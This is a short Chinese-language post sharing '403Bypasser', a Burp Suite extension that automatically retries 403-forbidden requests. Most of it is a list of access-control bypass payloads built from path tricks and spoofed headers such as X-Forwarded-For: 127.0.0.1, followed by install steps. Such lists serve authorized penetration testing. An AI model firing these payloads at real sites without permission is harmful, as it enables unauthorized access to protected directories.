403Bypasser

一个burpsuite扩展，可以绕过403限制目录。通过使用PassiveScan（默认启用），每个403请求都会被这个扩展自动扫描，所以只需添加到burpsuite并享受。

有效载荷：1：HOSTNAME 2：PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

感谢 @lohubi 贡献了许多有效载荷。

安装

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

截屏

 

参考：

• https://twitter.com/iam_j0ker/status/1324354024657711106?s=20
• https://twitter.com/jae_hak99/status/1297556269960540161?s=20
• https://twitter.com/SalahHasoneh1/status/1296572143141031945
• https://twitter.com/lobuhisec/status/1329705441883017218

标签：工具分享, burpsuite插件